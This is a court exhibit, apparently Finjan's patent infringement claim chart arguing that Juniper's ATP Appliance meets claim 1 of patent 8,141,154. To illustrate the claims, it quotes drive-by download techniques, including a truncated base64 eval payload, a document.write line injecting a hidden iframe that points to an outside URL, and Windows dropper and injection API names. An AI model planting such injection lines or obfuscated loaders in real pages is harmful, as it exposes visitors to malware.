Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 1 of 17
`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 1 of 17
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`EXHIBIT 3
`EXHIBIT 3
`
`
`
`
`
`
`
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 2 of 17
`
`Juniper’s ATP Appliance
` 8,141,154
`The statements and documents cited below are based on information available to Finjan, Inc. at the time
`this chart was created. Finjan reserves its right to supplement this chart as additional information
`becomes known to it.
`
`For purposes of this chart, “ATP Appliance” includes at least the following models that are used
`individually, or in combination and identified in Exhibit A. Based on public information, ATP
`Appliances all operate identically with respect to the identified claims and only vary based on software
`specifications and/or deployment options. ATP Appliances perform the infringing procedures on their
`own or as a distributed system in combination with Juniper Sky Advanced Threat Prevention (“Sky
`ATP”)1, as will be described in greater detail herein. Based on public information, ATP Appliances all
`operate identically with respect to the identified claims and only vary based on software specifications
`and/or deployment options.
`
`As identified and described element by element below, the one or more of the ATP Appliances infringe
`claim 1 of the ‘154 Patent.
`
`
`
`
`
`Claim 1
`1a. A system for protecting a
`computer from dynamically
`generated malicious content,
`comprising: a content
`processor (i) for processing
`content received over a
`network, the content
`including a call to a first
`function, and the call
`including an input, and (ii)
`for invoking a second
`function with the input, only
`if a security computer
`indicates that such invocation
`is safe;
`
`ATP Appliances meet the recited claim language because they provide a
`system with a content processor for processing content received over a
`network, the content including a call to a first function, and the call
`including an input, and for invoking a second function with the input,
`only if a security computer indicates that such invocation is safe.
`
`ATP Appliances meet the recited claim language because they protect
`computers from dynamically generated malicious content delivered
`through the web, email, and lateral threats (e.g. Drive-by-download;
`Zero-day Vulnerabilities that serve ransomware; backdoors by
`exploiting Browser and Adobe vulnerabilities; Web attack toolkits
`utilizing JavaScript; URL Malware propagating through websites and
`email; and Trojans that connect to URLs to download potentially
`malicious files) using behavior based technologies for processing
`content received over a network; with the content including a call to a
`first function (such as script function call, actions in PDF files, iFrames,
`as discussed in more detail below) and the call including an input (such
`as obfuscated content, the arguments of the JavaScript function or the
`PDF action, and can include an address, URL, URI, or IP address of a
`compromised website); and for invoking a second function (such as
`script function call, actions in PDF files, iFrames, as discussed in more
`detail below) with the input only if ATP Appliance or Sky ATP
`indicates that such invocation is safe.
`
`As shown, ATP Appliances include “collectors” and “SmartCore”
`components. ATP Appliance and include software and/or hardware on
`collector components to transmit the input to a SmartCore components
`of an ATP Appliance, which operates as a security computer that will
`inspect the input using static analysis, YARA, payload analysis,
`
`
`1 “Sky ATP” includes all components and services described in Exhibit A.
`
`1
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 3 of 17
`
`machine learning an behavioral analysis, malware reputation analysis,
`and SmartCore technology and return a result that indicates whether the
`content is safe to invoke.
`
`
`
`
`Examples of the first functions are JavaScript and iframes that can be
`embedded in HTTP communications and are used to obfuscate or hide
`redirects to download malicious code/shellcode/payloads from a
`compromised webpage, such as “drive-by downloads.” An example of
`first functions in the form of JavaScript functions include eval, unescape
`and document.write functions. For example, eval functions such as
`eval(base64_decode…) and eval(gzinflate…) are used to obfuscate or
`conceal automatic downloads of malware from a suspicious link or URI
`(e.g. malicious JavaScript, shellcode, drive-bydownload, droppers,
`installers, malicious binary). Typically, the shellcode is staged where
`the first small payload is inserted into the exploit and is designed to then
`download the larger second stage payload to extend the functionality of
`the shellcode. This web or HTTP content can include a call to a first
`function, where the call to a first function can be a number of different
`function calls written in JavaScript (e.g. eval, unescape,
`document.write, OnLoad, OnClick, OnMouseover, OnChange), and
`other functions that are used for obfuscation, redirection, heap spraying
`(e.g. NOP slide), payload (e.g. ROP, download execute malware).
`
`Another example of first function is ‘unescape()’ with a large amount of
`escaped data is detected. Such activity is suspicious as it indicates the
`attempt to inject a large amount of shell code or malicious HTML
`and/or JavaScript for the purpose of taking control of a system through
`a browser vulnerability. An example of first functions in the form of a
`'document.write()' function include
`document.write(unescape([obfuscated code])), where the first function
`is a document.write(). For example, when the document.write function
`is executed the result is an iframe injection to download from link or
`URL hidden via 0x0 iframe.
`
`Other examples of first functions are functions within PDFs for
`specifying the action to be performed automatically when the document
`is viewed such as downloading malware from a suspicious link or URL
`(e.g. OpenAction); Embed or Launch SWF functions within a PDF for
`running an embedded video file; and functions for launching JavaScript
`within a PDF (e.g. Launch).
`
`
`
`2
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 4 of 17
`
`
`Examples of second functions include recursive or suspicious scripts for
`obfuscating malicious links/URIs such as eval, unescape and
`document.write. In the following example,
`eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA
`9IE…)) is a second function that is recursively decoding the obfuscated
`code "ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IE…"
`Indirect calls to eval referencing the local scope of the current function
`or of unimplemented features (e.g. the document.lastModified property)
`are further examples of second functions.
`
`In another example, the first functions (stated above) are used to conceal
`the intent to invoke second function with the input (e.g. scripts or
`embedded malicious iframe in order to obfuscate the malicious link or
`URI, such as document.write("<iframe src="http: //cool .cn/ in.cgi?"
`width=1 height=1 style="visibility: hidden"></iframe>"). In this
`example, the second function (e.g. injected iframe with the input as
`"http: //cool.cn/ in.cgi?") is obfuscated by document.write. Additional
`combinations of functions include document.write(unescape([input])),
`where the first function is a document.write and the second function is
`an unescape. Other examples include scripts or iframes for performing
`mouse or keyboard interaction with a partially hidden element.
`
`Another example is email with a link to a video about a news story, but
`another valid page, can be "hidden" on top or underneath the "PLAY"
`functionality of a video. When the apparent "play" function is
`attempted, it is actually another second function that is invoked. Such
`second functions are typically takes the form of embedded script which
`load another page over it in a transparent layer using a concealed link or
`URI.
`
`Second functions are typically a subsequent function that causes a
`download from the same URL such as connecting to or download files
`from a remote command and control (CnC) server using
`HTTPSendRequest, InternetReadFile with the input (e.g. URL, IP, file).
`The content processor will invoke a second function (e.g. HTTPS file
`download) with the input (e.g. URL) if the security computer indicates
`that such invocation is safe.
`
`Second functions include sending results to a protected computer for
`automatically downloading from an obfuscated remote location and/or
`launching concealed input using certain combinations of JavaScript,
`iFrame injections and/or PDF (e.g. OpenAction or Launch). Such
`examples include JavaScript and OpenAction functions within PDFs for
`launching or downloading code for exploiting vulnerabilities within
`Adobe Reader and Adobe Acrobat such as malicious JavaScript,
`shellcode, drive-by download, droppers, installers and malicious
`binaries. Examples of such functions include URLDownloadToFile()
`for dropping malicious binaries; heap spraying functions including
`memory-related functions using PROCESS_MEMORY_COUNTERS;
`JavaScript functions in PDF for connecting to the Internet or making a
`
`
`
`3
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 5 of 17
`
`network connection such as app.mailmsg() and app.launchURL(), as
`well as CONNECT-related and LISTEN-related functions; functions for
`executing malware via DLL injection such as CreateRemoteThread();
`and functions for executing dropped malware, such as
`NtCreateProcess().
`
`The content processor can block attempts to invoke a second function
`with the input such as subsequent call to download from the URL(e.g.,
`NetOpenURL, Connect/ConnectEx to URL, Send/Ex to URL/IP,
`URLDownloadToFileA, URLDownloadToFileW,
`URLDownloadToCacheFileA, and URLDownloadToCacheFileW).
`
`As shown below, the ATP Appliances interface with a security
`computer, including the SmartCore analytics engine, static analysis,
`YARA, dynamic analysis, payload analysis, machine learning,
`behavioral analysis, and reputation analysis.
`
`
`
`
`
`
`4
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 6 of 17
`
`
`
`
`As described below, ATP Appliances will perform a second function
`only if the SmartCore components determine that the invoking this
`function is safe. ATP Appliances include the ability to mitigate and/or
`block malicious content based on the input, including through blocking
`malicious connections, protecting cloud assets, or prevention through
`third party security devices.
`
`
`
`
`
`
`5
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 7 of 17
`
`
`
`
`
`ATP Appliances protect from dynamically generated malicious content,
`comprising by processing content received over a network that includes
`content for a drive-by-download. The content including a call to a first
`function, and the call including an input that would direct the user to a
`drive-by-download location. ATP Appliances invoke a second function
`
`
`
`6
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 8 of 17
`
`with this input, only if ATP Appliances indicate that such invocation is
`safe. In particular, ATP Appliances will utilizing using chain heuristics
`to identify malicious traffic, including identifiers of web pages being
`directed to dubious links. ATP Appliances use this information to
`perform browser behavior analysis in a SmartCore security computer
`that simulates an HTTP session to simulate whether invoking content
`(like addresses, URLs, URIs, IPs, and artifacts) is potentially harmful.
`ATP Appliances also analyzes input in the form of dropper analysis on
`dropped files (artifacts) that are malware.
`
`
`
`
`
`As shown in the table below, the ATP Appliances interface with Sky
`ATP to submit inputs related to the location of C&C servers and infected
`cloud hosts, IP addresses for GeoIP location and black lists, extracted file
`content for analysis and C&C hits, content for malware analysis and
`threat detection, and content for internal compromise detection. ATP
`Appliances also interface with Spotlight Secure as a security computer.
`
`
`
`7
`
`
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 9 of 17
`
`sky-atp-admin-guide.pdf
`
`ATP Appliance also interface with an array of sandboxes as security
`computers to submit input to determine if they are malicious based on
`their behaviors. The security computers perform dynamic analysis to
`return and indicator of whether it is safe to invoke the second function
`with the input.
`
`
`
`
`
`
`ATP Appliances meet this element under the doctrine of equivalents.
`ATP Appliances perform the same function because they receive
`incoming content inspect the content using an engine, such as antivirus,
`static analysis, and dynamic analysis, for scanning, and proceed with the
`function calls of the content is determined safe. This is the same
`function as the claim element, which receives content, uses a security
`computer to determine if the invocation is safe, and invokes a second
`function with the input. In this way, the function of having the content
`received, inspected by the engine and determined safe, the second
`function with the input can be invoked.
`
`ATP Appliances perform the same function the same way because they
`receive incoming content that include a call to a first function and an
`input, and an engine, as antivirus, static analysis, and dynamic analysis,
`for scanning incoming content to determine whether the content is safe,
`and for invoking the second function with the input. This is the same
`ways as the claim element, which receives content, uses a security
`computer to determine if the invocation is safe, and invokes a second
`function with the input. ATP Appliances perform this same way
`because they receive incoming content with a call to a first function and
`an input, use scanners to determine whether the input is safe using an
`engine, and invoking the second function with the input. In this way, the
`way of receiving the content with a first function and an input and the
`invocation of the second function after a security computer has
`inspected the input has been accomplished.
`
`ATP Appliances achieve the same results because they modify content
`that they receiving incoming content inspect the content using an
`engine, as antivirus, static analysis, and dynamic analysis, for scanning,
`and proceed with the function calls of the content is determined safe.
`This is the same result as the claim element, which receives content,
`
`
`
`8
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 10 of 17
`
`a transmitter for transmitting
`the input to the security
`computer for inspection,
`when the first function is
`invoked; and
`
`uses a security computer to determine if the invocation is safe, and
`invokes a second function with the input. ATP Appliances achieve this
`results because they invoke the second function with the input after
`scanning determines the first function call with input is safe. In this
`way, the results of receiving the content with a first function and an
`input and the invocation of the second function after a security
`computer has inspected the input has been accomplished.
`ATP Appliance meets the recited claim language because it includes a
`transmitter for transmitting the input to the security computer for
`inspection, when the first function is invoked.
`
`ATP Appliance meets this claim element because they include software
`and/or hardware components that maintain a network connection (a
`transmitter) for transmitting an input to a SmartCore component of ATP
`Appliances for security evaluation for the input. ATP Appliance use
`this transmitter in its collector components to send the input (as
`described above and incorporated herein by reference) to SmartCore
`components of ATP Appliance use a predefined interface for submitting
`content. SmartCore components of ATP Appliance operate as a
`security computer because they analyze (using its analytics engine,
`static analysis, YARA, payload analysis, dynamic analysis, machine
`learning and behavioral analysis, malware reputation analysis, and
`SmartCore technology) the input to determine if it performs malicious
`or suspicious operations, or for some other reason poses a security risk.
`The input is transmitted when the first function is invoked because
`collector components of ATP Appliances transmit inputs such as
`automatically invoked files, obfuscated content, the arguments of the
`JavaScript function or the PDF action, and can include a URL or URI to
`a compromised website. In another scenario, the ATP Appliance uses a
`software component as part of its dynamic analysis to submit inputs to
`an array of sandboxes (security computers) for additional analysis.
`
`The figure below shows that collector components in ATP Appliance
`including a transmitter for sending an input to a SmartCore components
`of the ATP Appliance. As shown, the collector components include
`software and/or hardware to transmit the input to a SmartCore
`component of ATP Appliance, which operates as a security computer
`that will inspect the input using analytics engine, static analysis, YARA,
`payload analysis, dynamic analysis, machine learning and behavioral
`analysis, malware reputation analysis, and SmartCore technology.
`
`
`
`9
`
`
`
`

`

`
`
`
`
`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 11 of 17
`
`Architecture and Key Components
`
`
`
`10
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 12 of 17
`
`
`
`
`ATP Appliances include a transmitter for sending an input to Sky ATP.
`ATP Appliances include software and/or hardware to transmit the input
`to Sky ATP, which operates as a security computer that will inspect the
`input using a cache, antivirus, static analysis, dynamic analysis and with
`internal compromise detection databases. ATP Appliances also
`interface with Spotlight Secure as a security computer.
`
`
`
`11
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 13 of 17
`
`
`
`sky-atp-admin-guide.pdf
`
`ATP Appliance also includes software and/or hardware that transmit the
`input to an array of sandboxes as security computers to submit input to
`determine if they are malicious based on their behaviors. The array of
`sandboxes will return an indicator to determine if it is safe to invoke the
`content.
`
`
`
`
`
`ATP Appliances meet the recited claim language because they include a
`receiver for receiving an indicator from the security computer whether it
`is safe to invoke the second function with the input.
`
`ATP Appliances meet this claim element because they include software
`and/or hardware components that maintain a network connection (a
`receiver) for receiving and indicator from a SmartCore component of
`ATP Appliances. Collector components of ATP Appliances uses this
`receiver to receive over the network connection from the SmartCore
`components of ATP Appliances using a predefined interface for
`
`
`
`a receiver for receiving an
`indicator from the security
`computer whether it is safe to
`invoke the second function
`with the input.
`
`
`
`12
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 14 of 17
`
`receiving the security results. The SmartCore Component of ATP
`Appliances includes information on whether it is safe to invoke the
`second function (as described above and incorporated herein by
`reference) with the input because it identifies malicious or suspicious
`operations that is sent to the receiver in the collector of the ATP
`Appliances. In another scenario, the ATP Appliance uses a software
`component as part of its dynamic analysis to receive the results of
`inputs to an array of sandboxes (security computers) that were used for
`additional analysis and to determine whether the second function is safe
`to invoke with the input.
`
`The figure below shows that ATP Collectors include a receiver for
`receiving an indicator from SmartCore component on whether the it is
`safe to invoke the second function with the input. As shown, the
`collector components of ATP Appliances include software and/or
`hardware to receive results from SmartCore components of ATP
`Appliances, which operates as a security computer that will inspect the
`input using static analysis, YARA, payload analysis, machine learning
`an behavioral analysis, malware reputation analysis, and SmartCore
`technology.
`
`
`
`
`
`
`
`13
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 15 of 17
`
`14
`
`
`
`
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 16 of 17
`
`
`
`
`ATP Appliances include a receiver for receiving an indicator from Sky
`ATP on whether it is safe to invoke the second function with the input.
`ATP Appliances include software and/or hardware to receive results
`from Sky ATP, which operates as a security computer that will inspect
`the input using a cache, antivirus, static analysis, dynamic analysis and
`with internal compromise detection databases to determine if it is safe to
`invoke. ATP Appliances also interface with Spotlight Secure as a
`security computer.
`
`
`
`15
`
`

`

`Case 3:17-cv-05659-WHA Document 391-5 Filed 03/14/19 Page 17 of 17
`
`
`
`sky-atp-admin-guide.pdf
`
`ATP Appliances also include software and/or hardware that receive an
`indicator from the array of sandboxes as security computers to determine
`if they are malicious based on their behaviors and if the file is safe to
`invoke. The array of sandboxes will return an indicator to determine if it
`is safe to invoke the content.
`
`
`
`
`
`
`
`16
`
`
`
`
`
`